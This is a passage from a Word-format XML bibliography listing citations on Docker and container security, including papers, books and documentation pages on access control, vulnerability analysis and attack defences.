    <b:ConferenceName>Proceeding - 1st International Conference on Innovative Trends and Advances in Engineering and Technology, ICITAET 2019</b:ConferenceName>
    <b:RefOrder>32</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ABA17</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{31395B95-DA8C-411D-890E-DED38FFC82A9}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Ayed</b:Last>
            <b:First>A</b:First>
            <b:Middle>B.</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Subercaze</b:Last>
            <b:First>J</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Laforest</b:Last>
            <b:First>F</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Docker2RDF: Lifting the Docker Registry Hub into RDF</b:Title>
    <b:JournalName>2017 IEEE World Congress on Services (SERVICES)</b:JournalName>
    <b:Year>2017</b:Year>
    <b:Pages>36-39</b:Pages>
    <b:RefOrder>33</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>NMo21</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{E0D69C74-AE3F-441B-8654-E45A0267DB1A}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Mohd</b:Last>
            <b:First>N</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Mydin</b:Last>
            <b:First>M</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Ismail</b:Last>
            <b:First>I</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>An Operational View into Docker Registry with Scalability, Access Control and Image Assessment Bukhary ikhwan Ismail Malaysian Institute of Microelectronic Systems An Operational View into Docker Registry with Scalability, Access Control and Image Assessm</b:Title>
    <b:JournalName>researchgate</b:JournalName>
    <b:Year>2021</b:Year>
    <b:Pages>1-5</b:Pages>
    <b:RefOrder>34</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>AMJ15</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{9201C696-505F-4B8E-B1D6-6C73EC6E6856}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Joy</b:Last>
            <b:First>A.</b:First>
            <b:Middle>M</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Performance comparison between Linux containers and virtual machines</b:Title>
    <b:JournalName>Conference Proceeding - 2015 International Conference on Advances in Computer Engineering and Applications, ICACEA 2015</b:JournalName>
    <b:Year>2015</b:Year>
    <b:Pages>342-346</b:Pages>
    <b:RefOrder>36</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>EBa15</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{E977AE1E-A246-4D31-A2FC-E26BADA9FE9C}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Bacis</b:Last>
            <b:First>E</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Mutti</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Capelli</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>el</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>DockerPolicyModules: Mandatory Access Control for Docker containers</b:Title>
    <b:JournalName>2015 IEEE Conference on Communications and NetworkSecurity, CNS 2015</b:JournalName>
    <b:Year>2015</b:Year>
    <b:Pages>749-750</b:Pages>
    <b:RefOrder>37</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>RRo14</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{77E78317-5E65-4BE5-BD3B-18F307D4922E}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Rosen</b:Last>
            <b:First>R</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Linux containers and the future cloud</b:Title>
    <b:JournalName>Linux J</b:JournalName>
    <b:Year>2014</b:Year>
    <b:Pages>86-95</b:Pages>
    <b:Volume>240</b:Volume>
    <b:Issue>4</b:Issue>
    <b:RefOrder>38</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>KOh19</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{328DB82D-0851-406E-B27C-4632256CA636}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Oh</b:Last>
            <b:First>K</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Park</b:Last>
            <b:First>J</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Eom</b:Last>
            <b:First>Y</b:First>
            <b:Middle>I.</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Weight-Based Page Cache Management Scheme for Enhancing I/O Proportionality of Cgroups</b:Title>
    <b:JournalName>2019 IEEE International Conference on Consumer Electronics, ICCE 2019</b:JournalName>
    <b:Year>2019</b:Year>
    <b:Pages>1-3</b:Pages>
    <b:RefOrder>39</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>doc212</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{6A6D4EE5-F5E3-4A25-AC67-BF475607A7A4}</b:Guid>
    <b:Title>Docker Security</b:Title>
    <b:Author>
      <b:Author>
        <b:Corporate>docker</b:Corporate>
      </b:Author>
    </b:Author>
    <b:ProductionCompany>docker</b:ProductionCompany>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>6</b:DayAccessed>
    <b:URL>https://docs.docker.com/engine/security/</b:URL>
    <b:RefOrder>35</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>DHu19</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{4501B8CF-56DD-49BB-967B-ADD0E54CD125}</b:Guid>
    <b:Title>Security Analysis and Threats Detection Techniques on Docker Container</b:Title>
    <b:Year>2019</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Huang</b:Last>
            <b:First>D</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Cui</b:Last>
            <b:First>H</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Wen</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Huang</b:Last>
            <b:First>C</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>2019 IEEE 5th International Conference on Computer and Communications (ICCC)</b:JournalName>
    <b:Pages>1214-1220</b:Pages>
    <b:RefOrder>40</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>AMa18</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{0E2E1EAD-7B67-4802-9291-626B6DC48C80}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Martin</b:Last>
            <b:First>A</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Raponi</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Combe</b:Last>
            <b:First>T</b:First>
          </b:Person>
          <b:Person>
            <b:Last>el</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Docker ecosystem – Vulnerability Analysis</b:Title>
    <b:JournalName>Computer Communications</b:JournalName>
    <b:Year>2018</b:Year>
    <b:Pages>30-43</b:Pages>
    <b:Volume>122</b:Volume>
    <b:Issue>6</b:Issue>
    <b:RefOrder>41</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>HZh21</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{AD0D7FDF-F8AE-4BB6-B30B-044700C24873}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Zhu</b:Last>
            <b:First>H</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Gehrmann</b:Last>
            <b:First>C</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Lic-Sec: An enhanced AppArmor Docker security profile generator</b:Title>
    <b:JournalName>Journal of Information Security and Applications</b:JournalName>
    <b:Year>2021</b:Year>
    <b:Pages>102924</b:Pages>
    <b:Volume>61</b:Volume>
    <b:RefOrder>42</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>AEf20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{2ACA274A-DD39-4D0D-A844-F3E245EAF336}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Efe</b:Last>
            <b:First>A</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Aslan</b:Last>
            <b:First>U</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Securing Vulnerabilities in Docker Images</b:Title>
    <b:JournalName>International Journal of Innovative Engineering Applications</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>31-39</b:Pages>
    <b:Volume>4</b:Volume>
    <b:Issue>1</b:Issue>
    <b:RefOrder>43</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>SGa16</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Guid>{8813F335-E06F-4668-8B50-F99A48EBE465}</b:Guid>
    <b:Title>Securing Docker</b:Title>
    <b:Year>2016</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Gallagher</b:Last>
            <b:First>S</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Publisher>Packt Publishing</b:Publisher>
    <b:RefOrder>44</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>doc16</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{466AC119-8742-4C19-A44B-82DB3FD80F36}</b:Guid>
    <b:Title>Content trust in Docker | Docker Documentation</b:Title>
    <b:Year>2016</b:Year>
    <b:Author>
      <b:Author>
        <b:Corporate>docker</b:Corporate>
      </b:Author>
    </b:Author>
    <b:ProductionCompany>docker</b:ProductionCompany>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>15</b:DayAccessed>
    <b:URL>https://docs.docker.com/engine/security/trust/</b:URL>
    <b:RefOrder>47</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>git21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{133D9832-CB27-4886-B794-89AE824B1F80}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>github</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>GitHub - theupdateframework/notary: Notary is a project that allows anyone to have trust over arbitrary collections of data</b:Title>
    <b:ProductionCompany>github</b:ProductionCompany>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>12</b:DayAccessed>
    <b:URL>https://github.com/theupdateframework/notary</b:URL>
    <b:RefOrder>48</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>doc161</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{AD705D76-64F6-4762-9A17-FAA90E80B05D}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>docker </b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>docker</b:Title>
    <b:ProductionCompany>docker </b:ProductionCompany>
    <b:Year>2016</b:Year>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>11</b:DayAccessed>
    <b:URL>https://docs.docker.com/network/</b:URL>
    <b:RefOrder>45</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>TCo16</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{DDA53906-6BA2-4A60-B229-9DCBC621567C}</b:Guid>
    <b:Title>To Docker or Not to Docker: A Security Perspective</b:Title>
    <b:Year>2016</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Combe</b:Last>
            <b:First>T</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Martin</b:Last>
            <b:First>A</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Pietro</b:Last>
            <b:First>R</b:First>
            <b:Middle>Di</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>IEEE Cloud Computing</b:JournalName>
    <b:Pages>54-62</b:Pages>
    <b:Volume>5</b:Volume>
    <b:Issue>3</b:Issue>
    <b:RefOrder>46</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>DMe14</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{83AD95EF-ED77-435A-A80C-8DFB305DEA1A}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Merkel</b:Last>
            <b:First>D</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Docker: lightweight linux containers for consistent development and deployment</b:Title>
    <b:JournalName>Linux journal</b:JournalName>
    <b:Year>2014</b:Year>
    <b:Pages>1-5</b:Pages>
    <b:Volume>239</b:Volume>
    <b:Issue>2</b:Issue>
    <b:RefOrder>49</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>XXu20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{D5D9BCE3-0BC8-46E7-ADCB-3E870ED0ACFD}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Xu</b:Last>
            <b:First>X</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Xu</b:Last>
            <b:First>A</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Jiang</b:Last>
            <b:First>Y</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Research on Security Issues of Docker and Container Monitoring System in Edge Computing System</b:Title>
    <b:JournalName>Journal of Physics</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>012067</b:Pages>
    <b:Volume>1673</b:Volume>
    <b:RefOrder>50</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>RYa18</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{1BE02C60-D665-4A9D-AB6C-ADE2A7BAA7B8}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Yasrab</b:Last>
            <b:First>R</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Mitigating Docker Security Issues</b:Title>
    <b:JournalName>arXiv preprint arXiv:1804.05039</b:JournalName>
    <b:Year>2018</b:Year>
    <b:Pages>1-11</b:Pages>
    <b:RefOrder>51</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ZJi17</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{816E88D6-9AEF-4037-AB78-41C371CD1398}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Jian</b:Last>
            <b:First>Z</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Chen</b:Last>
            <b:First>L</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>A Defense Method against Docker Escape Attack</b:Title>
    <b:JournalName>Proceedings of the 2017 International Conference on Cryptography, Security and Privacy</b:JournalName>
    <b:Year>2017</b:Year>
    <b:Pages>142-146</b:Pages>
    <b:RefOrder>52</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>MDe19</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{85FB663B-D2FF-4004-94F9-BA78A579D13E}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Benedictis</b:Last>
            <b:First>M</b:First>
            <b:Middle>De</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Lioy</b:Last>
            <b:First>A</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Integrity verification of Docker containers for a lightweight cloud environment</b:Title>
    <b:JournalName>Future Generation Computer Systems</b:JournalName>
    <b:Year>2019</b:Year>
    <b:Pages>236-246</b:Pages>
    <b:Volume>97</b:Volume>
    <b:RefOrder>53</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>OWA21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{036A6512-3414-4C7D-8EA3-B4E924F74965}</b:Guid>
    <b:Title>Docker Security Cheat Sheet</b:Title>
    <b:Author>
      <b:Author>
        <b:Corporate>OWASP</b:Corporate>
      </b:Author>
    </b:Author>
    <b:ProductionCompany>OWASP</b:ProductionCompany>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>14</b:DayAccessed>
    <b:URL>https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html</b:URL>
    <b:RefOrder>55</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>EWi14</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{459129CA-BE22-42CB-8D39-64EE7505222E}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Windisch</b:Last>
            <b:First>E</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>On the Security of Containers</b:Title>
    <b:Year>2014</b:Year>
    <b:Month>October</b:Month>
    <b:Day>23</b:Day>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>15</b:DayAccessed>
    <b:URL>https://medium.com/@ewindisch/on-the-security-of-containers-2c60ffe25a9e</b:URL>
    <b:RefOrder>56</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>JRu14</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{2BFFA576-F209-4664-97B7-D3E0D92CE5F4}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Rudenberg</b:Last>
            <b:First>J</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Docker Image Insecurity</b:Title>
    <b:Year>2014</b:Year>
    <b:Month>December</b:Month>
    <b:Day>23</b:Day>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>16</b:DayAccessed>
    <b:URL>https://titanous.com/posts/docker-insecurity</b:URL>
    <b:RefOrder>58</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>DFG21</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{ACCF6E93-0D58-4E21-B541-336F845EDD2D}</b:Guid>
    <b:Title>SecDocker: Hardening the Continuous Integration Workflow Wrapping the container layer</b:Title>
    <b:Year>2021</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Gonz´alez</b:Last>
            <b:First>D</b:First>
            <b:Middle>F.</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Lera</b:Last>
            <b:First>F</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Esteban</b:Last>
            <b:First>G</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>arXiv e-prints</b:JournalName>
    <b:Pages>1-15</b:Pages>
    <b:RefOrder>59</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>JCh16</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{8633B0E5-F685-4D46-8DCA-9041D9660DB7}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Chelladhurai</b:Last>
            <b:First>J.</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Chelliah</b:Last>
            <b:First>P</b:First>
            <b:Middle>R.</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Kumar</b:Last>
            <b:First>S</b:First>
            <b:Middle>A.</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Securing docker containers from Denial of Service (DoS) attacks</b:Title>
    <b:JournalName>Proceedings - 2016 IEEE International Conference on Services Computing, SCC 2016</b:JournalName>
    <b:Year>2016</b:Year>
    <b:Pages>856-859</b:Pages>
    <b:RefOrder>60</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>MId21</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{19174695-A44C-49D2-B901-00A4C3C36DE0}</b:Guid>
    <b:Title>Implementation of Web Server Security Against Denial of Service (DoS) Attacks</b:Title>
    <b:JournalName>Workshop on Environmental Science, Society, and Technology (WESTECH 2020)</b:JournalName>
    <b:Year>2021</b:Year>
    <b:Pages>1-6</b:Pages>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Idhom</b:Last>
            <b:First>M</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Alit</b:Last>
            <b:First>R</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Fauzi</b:Last>
            <b:First>A</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>61</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>SSh20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{9245C390-5416-4AD9-A58A-EE9896C2112E}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Shakeri</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Veen</b:Last>
            <b:First>L</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Grosso</b:Last>
            <b:First>P</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Evaluation of Container Overlays for Secure Data Sharing</b:Title>
    <b:JournalName>Proceedings - 2020 IEEE 45th Local Computer Networks Symposium on Emerging Topics in Networking, LCN Symposium 2020</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>99-108</b:Pages>
    <b:RefOrder>62</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>MDa18</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{48EE0997-DBA2-4BEE-9710-BC5B1BA95389}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Data</b:Last>
            <b:First>M</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>The Defense Against ARP Spoofing Attack Using Semi-Static ARP Cache Table</b:Title>
    <b:JournalName>3rd International Conference on Sustainable Information Engineering and Technology, SIET 2018 - Proceedings</b:JournalName>
    <b:Year>2018</b:Year>
    <b:Pages>206-210</b:Pages>
    <b:RefOrder>63</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>MKh20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{05AFBA46-C064-4159-8EE1-70ECCF02E10F}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Khan</b:Last>
            <b:First>M</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Rehman</b:Last>
            <b:First>O</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Lightweight Testbed for Cybersecurity Experiments in SCADA-based Systems</b:Title>
    <b:JournalName>2020 International Conference on Computing and Information Technology, ICCIT 2020</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>1-5</b:Pages>
    <b:RefOrder>64</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>LLM20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{0FEA7E7F-679E-440F-8F31-4CADA66CEDC5}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Mentz</b:Last>
            <b:First>L</b:First>
            <b:Middle>L</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Loch</b:Last>
            <b:First>W</b:First>
            <b:Middle>J</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Koslovski</b:Last>
            <b:First>G</b:First>
            <b:Middle>P</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Comparative experimental analysis of Docker container networking drivers</b:Title>
    <b:JournalName>Proceedings - 2020 IEEE 9th International Conference on Cloud Networking, CloudNet 2020</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>1-7</b:Pages>
    <b:RefOrder>65</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Doc21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{4D2AC400-2EB5-4B7D-88FA-D3182A08C6D8}</b:Guid>
    <b:Title>Use bridge networks</b:Title>
    <b:Author>
      <b:Author>
        <b:Corporate>Docker Documentaion</b:Corporate>
      </b:Author>
    </b:Author>
    <b:ProductionCompany>Docker</b:ProductionCompany>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>21</b:DayAccessed>
    <b:URL>https://docs.docker.com/network/bridge/</b:URL>
    <b:RefOrder>66</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>JNa20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{032716B3-2A2F-47B5-880D-655451F967FA}</b:Guid>
    <b:Title>BASTION: A Security Enforcement Network Stack for Container Networks</b:Title>
    <b:Year>2020</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Nam</b:Last>
            <b:First>J</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Lee</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Seo</b:Last>
            <b:First>H</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>2020 USENIX Annual Technical Conference</b:JournalName>
    <b:Pages>81-95</b:Pages>
    <b:RefOrder>67</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>NGe17</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{4E064D88-E439-47B5-BED1-8A26AEE56C1E}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Gelernter</b:Last>
            <b:First>N</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Kalma</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Magnezi</b:Last>
            <b:First>B</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Porcilan</b:Last>
            <b:First>H</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>The Password Reset MitM Attack</b:Title>
    <b:JournalName>Proceedings - IEEE Symposium on Security and Privacy</b:JournalName>
    <b:Year>2017</b:Year>
    <b:Pages>251-267</b:Pages>
    <b:RefOrder>68</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>SUp16</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{E9C5539E-7C17-48E3-95E1-8ECB6C104C36}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Upadhya</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Shetty</b:Last>
            <b:First>J</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Rajeshwari</b:Last>
            <b:First>R</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>A State-of-Art Review of Docker Container Security Issues and Solutions</b:Title>
    <b:JournalName>American International Journal of Research in Science, Technology, Engineering \&amp; Mathematics</b:JournalName>
    <b:Year>2016</b:Year>
    <b:Pages>33-36</b:Pages>
    <b:Volume>17</b:Volume>
    <b:Issue>1</b:Issue>
    <b:RefOrder>57</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>AMo15</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Guid>{D208BBA7-F170-41F8-9688-9D1127B3D756}</b:Guid>
    <b:Title>Docker Security: Using Containers Safely in Production</b:Title>
    <b:Year>2015</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Mouat</b:Last>
            <b:First>A</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Publisher>O'Reilly Media</b:Publisher>
    <b:RefOrder>69</b:RefOrder>
